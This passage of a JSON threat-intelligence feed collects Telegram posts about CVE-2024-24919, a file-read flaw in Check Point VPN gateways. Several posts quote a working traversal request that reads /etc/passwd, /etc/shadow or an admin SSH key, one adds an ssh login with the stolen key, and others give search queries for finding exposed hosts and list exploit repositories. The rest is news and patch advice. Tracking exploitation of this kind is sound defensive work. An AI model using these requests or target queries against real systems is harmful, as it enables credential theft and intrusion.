R80.20.x, R80.20SP, R80.30, R80.30SP, R80.40, R81, R81.10, R81.10.x, R81.20\n\u2705 \u0420\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0430\u0446\u0438\u0438: \u041f\u0430\u0442\u0447\u0438 \u0443\u0436\u0435 \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b", "creation_timestamp": "2024-06-04T07:02:46.000000Z"}, {"uuid": "fd6131e6-f63c-4924-ab22-29ea99c528b4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "published-proof-of-concept", "source": "https://t.me/NinjaSec/201", "content": "\ud83d\udd27 CVE Exploitation Tools (2024\u20132025)\n\n1. CVE-2024-25600 \u2013 WordPress Bricks Builder RCE\n\n2. CVE-2024-24919 \u2013 Check Point Security Gateway RCE\n\n3. CVE-2024-29025 \u2013 Netty HttpPostRequestDecoder DoS\n\n4. CVE-2024-21525 \u2013 node-twain Buffer Overflow\n\n5. CVE-2024-3094 \u2013 XZ Backdoor Detector\n\n6. CVE-2024-21515 \u2013 OpenCart Reflected XSS\n\n7. CVE-2024-21552 \u2013 SuperAGI Arbitrary Code Execution\n\n8. CVE-2024-56249 \u2013 WordPress WPMasterToolKit Arbitrary File Upload\n\n9. CVE-2024-24919 \u2013 Check Point VPN Exploit\n\n10. CVE-2024-24919 \u2013 Python Exploit Script\n\nPython script to exploit CVE-2024-24919 vulnerability.\n\nGitHub: LucasKatashi/CVE-2024-24919\n\n11. CVE-2024-24919 \u2013 Exploit PoC\n\nProof-of-Concept for exploiting CVE-2024-24919.\n\nGitHub: seed1337/CVE-2024-24919-POC\n\n12. CVE-2024-24919 \u2013 Check Point Remote Access VPN Exploit\n\nScripts to exploit CVE-2024-24919 in Check Point VPNs.\n\nGitHub: Praison001/CVE-2024-24919-Check-Point-Remote-Access-VPN\n\n13. CVE-2024-25600 \u2013 Alternate Exploit Script\n\nAnother implementation to exploit Bricks Builder RCE.\n\nGitHub: meli0dasH4ck3r/cve-2024-25600\n\n14. CVE-2024-25600 \u2013 Exploit Script\n\nPython script to exploit Bricks Builder RCE vulnerability.\n\nGitHub: K3ysTr0K3R/CVE-2024-25600-EXPLOIT \n\n\n\ud83d\udd27 CVE Exploitation Tools &amp; Frameworks\n\n1. trickest/cve\n\n\ud83d\udd17 https://github.com/trickest/cve\n\n2. PayloadsAllTheThings \u2013 CVE Exploits\n\n\ud83d\udd17 https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/CVE%20Exploits/README.md\n\n3. qazbnm456/awesome-cve-poc\n\n\ud83d\udd17 https://github.com/qazbnm456/awesome-cve-poc\n\n4. intel/cve-bin-tool\n\n\ud83d\udd17 https://github.com/intel/cve-bin-tool\n\n5. cve-search/cve-search\nN\n\n\ud83d\udd17 https://github.com/cve-search/cve-search\n\n6. vertoforce/CVE-Enrichment\n\n\ud83d\udd17 https://github.com/vertoforce/CVE-Enrichment\n\n7. TURROKS/CVE_Prioritizer\n\n\ud83d\udd17 https://github.com/TURROKS/CVE_Prioritizer\n\n8. clearlinux/cve-check-tool\n\n\ud83d\udd17 https://github.com/clearlinux/cve-check-tool\n\n9. cddmp/cvecheck\n\n\ud83d\udd17 https://github.com/cddmp/cvecheck\n\n10. center-for-threat-informed-defense/attack_to_cve\n\nMaps MITRE ATT&amp;CK techniques to CVEs to characterize vulnerability impacts.\n\n\ud83d\udd17 https://github.com/center-for-threat-informed-defense/attack_to_cve\n\n\n\ud83e\uddea Specific CVE Exploit Tools\n\n11. CVE-2024-25600 Exploit Tool\n\nDesigned to exploit a vulnerability in the Bricks Builder plugin for WordPress.\n\n\ud83d\udd17 https://github.com/Chocapikk/CVE-2024-25600\n\n12. RevoltSecurities/CVE-2024-24919\n\nTool to detect and exploit CVE-2024-24919 vulnerability.\n\n\ud83d\udd17 https://github.com/RevoltSecurities/CVE-2024-24919\n\n13. ROCA Detection Tool\n\nDetects RSA keys vulnerable to the ROCA vulnerability (CVE-2017-15361).\n\n\ud83d\udd17 https://github.com/crocs-muni/roca\n\n\ud83d\udee0\ufe0f Additional Tools &amp; Resources\n\n14. Goby\n\nA network security assessment tool that can scan for vulnerabilities and map attack surfaces.\n\n\ud83d\udd17 https://github.com/gobysec/Goby\n\n15. awesome-pentestu\n\nA curated list of penetration testing resources, including tools for CVE exploitation.\n\n\ud83d\udd17 https://github.com/enaqx/awesome-pentest\n\n16. awesome-bugbounty-tools\n\nA collection of tools useful for bug bounty hunting, some of which relate to CVE exploitation.\n\n\ud83d\udd17 https://github.com/vavkamil/awesome-bugbounty-tools\n\n17. cyberguideme/Tools\n\nA repository of various cybersecurity tools, including those for exploiting known vulnerabilities.\n\n\ud83d\udd17 https://github.com/cyberguideme/Tools\n\n\n#GrayHats", "creation_timestamp": "2025-04-18T19:33:22.000000Z"}, {"uuid": "d9aaf193-64a9-4760-b619-94f21671ab22", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "published-proof-of-concept", "source": "https://t.me/poxek/4112", "content": "\u041f\u0440\u0438\u0432\u0435\u0442, \u0434\u0440\u0443\u0437\u044c\u044f! \u0421\u0435\u0433\u043e\u0434\u043d\u044f \u0443 \u043d\u0430\u0441 \u043d\u0430 \u043f\u043e\u0432\u0435\u0441\u0442\u043a\u0435 \u0434\u043d\u044f CVE-2024-24919. \u042d\u0442\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 Check Point Remote Access VPN \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0447\u0438\u0442\u0430\u0442\u044c \u0444\u0430\u0439\u043b\u044b \u043d\u0430 \u0445\u043e\u0441\u0442\u0435 (LFI), \u043f\u0440\u0438\u0447\u0435\u043c \u0441 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u044f\u043c\u0438 root. \u0423\u044f\u0437\u0432\u0438\u043c\u044b\u043c\u0438 \u044f\u0432\u043b\u044f\u044e\u0442\u0441\u044f \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0435 \u043f\u0440\u043e\u0434\u0443\u043a\u0442\u044b:\n\n  - CloudGuard Network\n  - Quantum Maestro\n  - Quantum Scalable Chassis\n  - Quantum Security Gateways\n  - Quantum Spark Appliances\n\n- \u0412\u0435\u0440\u0441\u0438\u0438:\n  - R77.20 (EOL)\n  - R77.30 (EOL)\n  - R80.10 (EOL)\n  - R80.20 (EOL)\n  - R80.20.x\n  - R80.20SP (EOL)\n  - R80.30 (EOL)\n  - R80.30SP (EOL)\n  - R80.40 (EOL)\n  - R81\n  - R81.10\n  - R81.10.x\n  - R81.20\n\nPOC\n\nPOST /clients/MyCRL HTTP/1.1 \nHost: target_host \nContent-Length: 63 \n \naCSHELL/../../../../../../../etc/passwd\n\n\n\n\u0420\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u0435\u043c \u0441\u0440\u043e\u0447\u043d\u043e \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u044c \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f: https://support.checkpoint.com/results/sk/sk182336\n\n#cve", "creation_timestamp": "2024-05-30T15:00:26.000000Z"}, {"uuid": "c039bec6-f6dc-4952-9236-1268389a088d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7475", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aSimple POC Python script that check &amp; leverage Check Point CVE-2024-24919 vulnerability (Wrong Check Point)\nURL\uff1ahttps://github.com/zam89/CVE-2024-24919\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-05-31T08:04:02.000000Z"}, {"uuid": "15ba8833-d113-4e75-b15e-3409f5e2dabb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "https://t.me/HackerNewscyber/1860", "content": "\ud83d\udd34\u0645\u0647\u0627\u062c\u0645\u0627\u0646 \u0645\u0631\u062a\u0628\u0637 \u0628\u0627 \u0686\u06cc\u0646 \u0627\u0632 \u0646\u0642\u0635 \u0646\u0642\u0637\u0647 \u0686\u06a9 \u0628\u0631\u0627\u06cc \u0627\u0633\u062a\u0642\u0631\u0627\u0631 ShadowPad \u0648 \u0628\u0627\u062c\u200c\u0627\u0641\u0632\u0627\u0631 \u0633\u0648\u0621 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0645\u06cc\u200c\u06a9\u0646\u0646\u062f.\n\n\ud83d\udd3a\u0647\u06a9\u0631\u0647\u0627\u06cc \u0686\u06cc\u0646\u06cc \u0627\u0632 CVE-2024-24919 \u0628\u0631\u0627\u06cc \u0627\u0633\u062a\u0642\u0631\u0627\u0631 \u0628\u062f\u0627\u0641\u0632\u0627\u0631 ShadowPad \u0648 \u0628\u0627\u062c \u0627\u0641\u0632\u0627\u0631 NailaoLocker \u0633\u0648\u0621 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u06a9\u0631\u062f\u0646\u062f \u0648 \u0634\u0628\u06a9\u0647 \u0647\u0627\u06cc \u0645\u0631\u0627\u0642\u0628\u062a \u0647\u0627\u06cc \u0628\u0647\u062f\u0627\u0634\u062a\u06cc \u0627\u0631\u0648\u067e\u0627\u06cc\u06cc \u0631\u0627 \u0647\u062f\u0641 \u0642\u0631\u0627\u0631 \u062f\u0627\u062f\u0646\u062f.\n\n\n\ud83d\udea8 @HackerNewsCyber", "creation_timestamp": "2025-02-20T12:26:38.000000Z"}, {"uuid": "96af357f-7926-4719-b9b0-56a6c8bf5109", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "published-proof-of-concept", "source": "https://t.me/TheDarkWebInformer/17889", "content": "\ud83d\udea8CVE-2024-24919: Check Point Remote Access VPN vulnerability  \n\nFOFA Link: https://en.fofa.info/result?qbase64=dGl0bGU9IkNoZWNrIFBvaW50IFNTTCBOZXR3b3JrIEV4dGVuZGVyIiA%3D\n\nFOFA Query 1: app=\"Check_Point-SSL-Network-Extender\"\n\nOR\n\nFOFA Query 2: title=\"Check Point SSL Network Extender\" \n\nResults: 45,343\n\nAdvisory: https://nvd.nist.gov/vuln/detail/cve-2024-24919\n\nPoC: https://labs.watchtowr.com/check-point-wrong-check-point-cve-2024-24919/\n\nCVSS: 8.6", "creation_timestamp": "2025-06-09T19:19:49.000000Z"}, {"uuid": "4f306aae-08cf-44f1-b05f-0b4073d03ba4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7481", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aExploit tool to validate CVE-2024-24919 vulnerability on Checkpoint Firewall VPNs\nURL\uff1ahttps://github.com/GlobalsecureAcademy/CVE-2024-24919\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-05-31T17:18:19.000000Z"}, {"uuid": "217a5a34-e401-4e7e-af56-821c864b5b8b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/9536", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCheck-Point\u5b89\u5168\u7f51\u5173\u4efb\u610f\u6587\u4ef6\u8bfb\u53d6\u6f0f\u6d1e(CVE-2024-24919)\nURL\uff1ahttps://github.com/NingXin2002/Check-Point_poc\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-12-21T02:45:12.000000Z"}, {"uuid": "1e18d43d-6369-47b4-a0a5-cdec196b771c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "Telegram/PhmvZbyfLMPdylqvOlvvqyeAGGv8Bha5o2TuUdrda6iNew", "content": "", "creation_timestamp": "2024-05-29T19:56:56.000000Z"}, {"uuid": "d8d191eb-07ba-425a-bbef-fd890e985cc6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "published-proof-of-concept", "source": "Telegram/jP6AV-r7odvU7D9g0u7E0spiHkl_ZeChlbronu9cOLC7Yg", "content": "", "creation_timestamp": "2024-06-03T04:05:10.000000Z"}, {"uuid": "a021289e-6039-44dc-9fa2-635525c19845", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "published-proof-of-concept", "source": "https://t.me/realLulzSec/2241", "content": "CVE-2024-24919\n\nPOST /clients/MyCRL HTTP/1.1\nHost: \nAccept-Encoding: gzip\n\naCSHELL/../../../../../../../etc/passwd\n\n\nfofa :  body=\"check point ssl network\" &amp;&amp; country=\"IL\"\n\n#exploit #poc", "creation_timestamp": "2024-10-09T14:33:11.000000Z"}, {"uuid": "81165182-2557-498b-9cfb-d6a881144643", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "https://t.me/HackerNewscyber/9574", "content": "\ud83d\udd34\u0645\u0647\u0627\u062c\u0645\u0627\u0646 \u0645\u0631\u062a\u0628\u0637 \u0628\u0627 \u0686\u06cc\u0646 \u0627\u0632 \u0646\u0642\u0635 \u0646\u0642\u0637\u0647 \u0686\u06a9 \u0628\u0631\u0627\u06cc \u0627\u0633\u062a\u0642\u0631\u0627\u0631 ShadowPad \u0648 \u0628\u0627\u062c\u200c\u0627\u0641\u0632\u0627\u0631 \u0633\u0648\u0621 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0645\u06cc\u200c\u06a9\u0646\u0646\u062f.\n\n\ud83d\udd3a\u0647\u06a9\u0631\u0647\u0627\u06cc \u0686\u06cc\u0646\u06cc \u0627\u0632 CVE-2024-24919 \u0628\u0631\u0627\u06cc \u0627\u0633\u062a\u0642\u0631\u0627\u0631 \u0628\u062f\u0627\u0641\u0632\u0627\u0631 ShadowPad \u0648 \u0628\u0627\u062c \u0627\u0641\u0632\u0627\u0631 NailaoLocker \u0633\u0648\u0621 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u06a9\u0631\u062f\u0646\u062f \u0648 \u0634\u0628\u06a9\u0647 \u0647\u0627\u06cc \u0645\u0631\u0627\u0642\u0628\u062a \u0647\u0627\u06cc \u0628\u0647\u062f\u0627\u0634\u062a\u06cc \u0627\u0631\u0648\u067e\u0627\u06cc\u06cc \u0631\u0627 \u0647\u062f\u0641 \u0642\u0631\u0627\u0631 \u062f\u0627\u062f\u0646\u062f.\n\n\n\ud83d\udea8 @HackerNewsCyber", "creation_timestamp": "2025-02-20T13:27:11.000000Z"}, {"uuid": "f86e6eea-a154-4fe4-a1d1-03074a7bf34a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "Telegram/lWEvRAjK7s51oj-tMbc_H8xLpTaZQCKLKrN87oTXrjCdfL0", "content": "", "creation_timestamp": "2025-02-20T13:27:11.000000Z"}, {"uuid": "d8cfbf88-196d-4822-99cd-d313a9618dbb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "https://t.me/ton618cyber/2524", "content": "Chinese-Linked Attackers Exploit Check Point Flaw to Deploy ShadowPad and Ransomware\n\nChinese-aligned hackers exploited CVE-2024-24919 to deploy ShadowPad malware and NailaoLocker ransomware, targeting European healthcare networks.\n\nThe Hacker News | thehackernews.com \u2022 Feb 20, 2025", "creation_timestamp": "2025-02-21T09:28:12.000000Z"}, {"uuid": "5dfcf7be-f778-4682-8687-e9c766eb4ebf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "published-proof-of-concept", "source": "https://t.me/TheDarkWebInformer/5276", "content": "\ud83d\udea8CVE-2024-24919 - Check Point Quantum Security Gateways with IPsec VPN in Remote Access VPN PoC\n\nhttps://darkwebinformer.com/cve-2024-24919-check-point-quantum-security-gateways-with-ipsec-vpn-in-remote-access-vpn-poc/", "creation_timestamp": "2024-10-11T00:08:59.000000Z"}, {"uuid": "7b9d813d-b9f6-415b-9a91-3ecd1db119ef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "https://t.me/ton618cyber/6774", "content": "Chinese-Linked Attackers Exploit Check Point Flaw to Deploy ShadowPad and Ransomware\n\nChinese-aligned hackers exploited CVE-2024-24919 to deploy ShadowPad malware and NailaoLocker ransomware, targeting European healthcare networks.\n\nThe Hacker News | thehackernews.com \u2022 Feb 20, 2025", "creation_timestamp": "2025-02-21T09:28:12.000000Z"}, {"uuid": "4f0763ec-f16f-4832-80fb-a580177c47ad", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "published-proof-of-concept", "source": "https://t.me/Kelvinseccommunity/461", "content": "https://github.com/ifconfig-me/CVE-2024-24919-Bulk-Scanner\n\nCVE-2024-24919 Bulk Scanner\n#github #poc", "creation_timestamp": "2024-06-03T05:55:44.000000Z"}, {"uuid": "9c95aaca-2df1-4f13-a1d5-5d2e417bb241", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "published-proof-of-concept", "source": "https://t.me/realLulzSec/19470", "content": "CVE-2024-24919\n\nPOST /clients/MyCRL HTTP/1.1\nHost: \nAccept-Encoding: gzip\n\naCSHELL/../../../../../../../etc/passwd\n\n\nfofa :  body=\"check point ssl network\" &amp;&amp; country=\"IL\"\n\n#exploit #poc", "creation_timestamp": "2024-10-09T14:33:11.000000Z"}, {"uuid": "4a49ecee-61f9-422f-8b45-02ec9e46a2d7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "published-proof-of-concept", "source": "https://t.me/Hunt3rkill3rs1/358", "content": "CVE-2024-24919 Check Point Remote Access VPN 0-Day\n\u041d\u0443 \u0438\u043b\u0438 \u0442\u0430\u043a \ud83d\ude31\naCSHELL/../../../../../../../\nhome/admin/.ssh/id_rsa\n\u2705\nssh admin@\u0425\u043e\u0441\u0442\u044a -i id_rsa", "creation_timestamp": "2024-05-30T14:59:16.000000Z"}, {"uuid": "98fe0399-f3b2-48c3-b4ec-1e55f1bca5da", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "published-proof-of-concept", "source": "Telegram/CotWkdBj-N9SwRPA1BvFuwJZzos8NAv0H5COgMHruAhPGg", "content": "", "creation_timestamp": "2024-10-09T17:15:04.000000Z"}, {"uuid": "533c7bfe-fbd7-4a1f-af6b-1e205796d280", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "https://t.me/anoncombo2023/373", "content": "CVE-2024-24919-POC", "creation_timestamp": "2024-06-06T06:56:57.000000Z"}, {"uuid": "84a1bc33-bbcf-4047-bc60-b8c27d8e6867", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "https://t.me/HackingInsights/1956", "content": "Check Point Security Gateway Information Disclosure Vulnerability (CVE-2024-24919)\nhttps://ift.tt/t01d6ze", "creation_timestamp": "2024-06-08T18:59:40.000000Z"}, {"uuid": "3b5ce253-962b-4d3f-8970-46245398bf31", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "published-proof-of-concept", "source": "https://t.me/IntrusionExploit/137", "content": "Check point:CVE-2024-24919 \nDork: \"Server: Check Point SVN\" \"X-UA-Compatible: IE=EmulateIE7\"\n\ntemplates:https://github.com/johnk3r/nuclei-templates/blob/main/http/cves/2024/CVE-2024-24919.yaml", "creation_timestamp": "2024-06-01T21:23:41.000000Z"}, {"uuid": "7eaef19b-1ad5-4212-8c7e-1ee64d148d02", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "published-proof-of-concept", "source": "Telegram/4xJLMqwRdve-aldMwyrLi_pTf5r96_RMZzthxqOorP_mUA", "content": "", "creation_timestamp": "2024-09-14T07:08:08.000000Z"}, {"uuid": "9fe64428-8a95-4b34-b361-5052d2c1e158", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "https://t.me/HackingInsights/1449", "content": "\u200a13,800+ Check Point Gateways Exposed: 0-Day CVE-2024-24919 Flaw Under Attack\n\nhttps://securityonline.info/13800-check-point-gateways-exposed-0-day-cve-2024-24919-flaw-under-attack/", "creation_timestamp": "2024-06-03T20:07:53.000000Z"}, {"uuid": "581f4294-c831-48f7-9300-27eca1e9da12", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "https://t.me/HackingInsights/1349", "content": "\u200aNew in CISA KEV: Check Point VPN Zero-Day CVE-2024-24919 &amp; Linux Kernel Flaw CVE-2024-1086\n\nhttps://malware.news/t/new-in-cisa-kev-check-point-vpn-zero-day-cve-2024-24919-linux-kernel-flaw-cve-2024-1086/82541", "creation_timestamp": "2024-06-01T20:15:08.000000Z"}, {"uuid": "dbd6743a-1d3e-4ddb-b69a-650055fbdb02", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "published-proof-of-concept", "source": "https://t.me/HackingInsights/1288", "content": "#exploit\n1. CVE-2024-24919:\nCheck Point - Wrong Check Point\nhttps://labs.watchtowr.com/check-point-wrong-check-point-cve-2024-24919\n\n2. CVE-2024-30043:\nAbusing URL Parsing Confusion to Exploit XXE on SharePoint Server and Cloud\nhttps://www.zerodayinitiative.com/blog/2024/5/29/cve-2024-30043-abusing-url-parsing-confusion-to-exploit-xxe-on-sharepoint-server-and-cloud\n\n3. Post-Exploiting an F5 Big-IP\nhttps://offsec.almond.consulting/post-exploiting-f5-BIG-IP.html", "creation_timestamp": "2024-06-01T15:14:57.000000Z"}, {"uuid": "06d73cd9-5e2a-4fc4-a90b-246a6c561002", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "published-proof-of-concept", "source": "https://t.me/IntrusionExploit/143", "content": "CVE-2024-24919 POC\nCheck Point Remote Access VPN 0-Day\nNuclei Template: Link\n\n__EXAMPLE\nPOST /clients/MyCRL HTTP/1.1\nHost: \nContent-Length: 39\n\naCSHELL/../../../../../../../etc/shadow\n\n__EXAMPLE\nPOST /clients/MyCRL HTTP/1.1\nHost: \nContent-Length: 51\n\naCSHELL/../../../../../../../home/admin/.ssh/id_rsa\n\n#cve #CVE202424919", "creation_timestamp": "2024-07-08T12:59:34.000000Z"}, {"uuid": "7301dd1e-c723-41bb-85e4-5d81c14bf0e2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "published-proof-of-concept", "source": "https://t.me/tengkorakcybercrewz/16003", "content": "", "creation_timestamp": "2024-07-24T12:45:42.000000Z"}, {"uuid": "480b286e-e3c5-4839-b6fc-4325e229f890", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "Telegram/XGPfE--KGXeCyRAxdnMm_vnHEP_j3OQQxCfUT5gkD3Q9U6q7", "content": "", "creation_timestamp": "2024-06-01T23:23:25.000000Z"}, {"uuid": "19832937-b591-4806-935f-4e279b6d0b4b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "Telegram/eGFBnZkZUc1w9Q5n5y3DGKo8PJ4RYbSMRruR0tLXVdPTdg", "content": "", "creation_timestamp": "2025-02-20T13:27:12.000000Z"}, {"uuid": "02971e14-677b-4c0e-8c99-7580e04a28f7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "https://t.me/tengkorakcybercrewz/9479", "content": "The Hacker News\nCheck Point Warns of Zero-Day Attacks on its VPN Gateway Products\n\nCheck Point is warning of a zero-day vulnerability in its Network Security gateway products that threat actors have exploited in the wild.\nTracked as CVE-2024-24919, the issue impacts CloudGuard Network, Quantum Maestro, Quantum Scalable Chassis, Quantum Security Gateways, and Quantum Spark appliances.\n\"The vulnerability potentially allows an attacker to read certain information on", "creation_timestamp": "2024-05-29T19:56:53.000000Z"}, {"uuid": "6450dde6-94df-44ff-8e4b-632cb2a83b02", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "published-proof-of-concept", "source": "https://t.me/AGENTZSECURITY/1253", "content": "https://github.com/toramanemre/log4j-rce-detect-waf-bypass\nhttps://github.com/trickest/log4j\nhttps://github.com/twseptian/custom-nuclei-templates\nhttps://github.com/umityn/my-nuclei-templates\nhttps://github.com/v3l4r10/Nuclei-Templates\nhttps://github.com/valaDevs/env-js-nuclei\nhttps://github.com/valaDevs/nuclei-backupfile-finder\nhttps://github.com/vidocsecurity/templates\nhttps://github.com/vishal12300/all_nuclei_templatess\nhttps://github.com/vsh00t/nuclei-templates\nhttps://github.com/vulnspace/nuclei-templates\nhttps://github.com/wasp76b/nuclei-templates\nhttps://github.com/wearetyomsmnv/llm_integrated_nuclei_templates\nhttps://github.com/websecresearch/nucleirecordloginsession\nhttps://github.com/windyGarlic/my-nuclei-templates\nhttps://github.com/windyGarlic/nuclei-templates\nhttps://github.com/wr00t/templates\nhttps://github.com/xelemental/Nuclei-Templates\nhttps://github.com/xinZa1/template\nhttps://github.com/xjhonly/nuclei-templates\nhttps://github.com/yarovit-developer/nuclei-templates\nhttps://github.com/yavolo/nuclei-templates\nhttps://github.com/z3bd/nuclei-templates\nhttps://github.com/zer0yu/Open-PoC\nhttps://github.com/zinminphyo0/KozinTemplates\nhttps://github.com/zodmagus/z0ds3c-Nuclei-Templates\nhttps://github.com/Christbowel/CVE-2024-25600_Nuclei-Template\nhttps://github.com/0xr2r/templates-nucleir2r\nhttps://github.com/al00000000al/my_nuclei_templates\nhttps://github.com/JohnDoeAnonITA/NucleiTemplatePRV\nhttps://github.com/emo-crab/scap-rs\nhttps://github.com/blackvitasoy/nuclei_templates\nhttps://github.com/BattalFaikAktas/custom-nuclei-templates\nhttps://github.com/0xc4sper0/Nuclei-templates\nhttps://github.com/abletsoff/custom-nuclei-templates\nhttps://github.com/rzizah/private-nuclei-template\nhttps://github.com/0xPugal/my-nuclei-templates\nhttps://github.com/jhonnybonny/nuclei-templates-bitrix\nhttps://github.com/Anja-dhnd/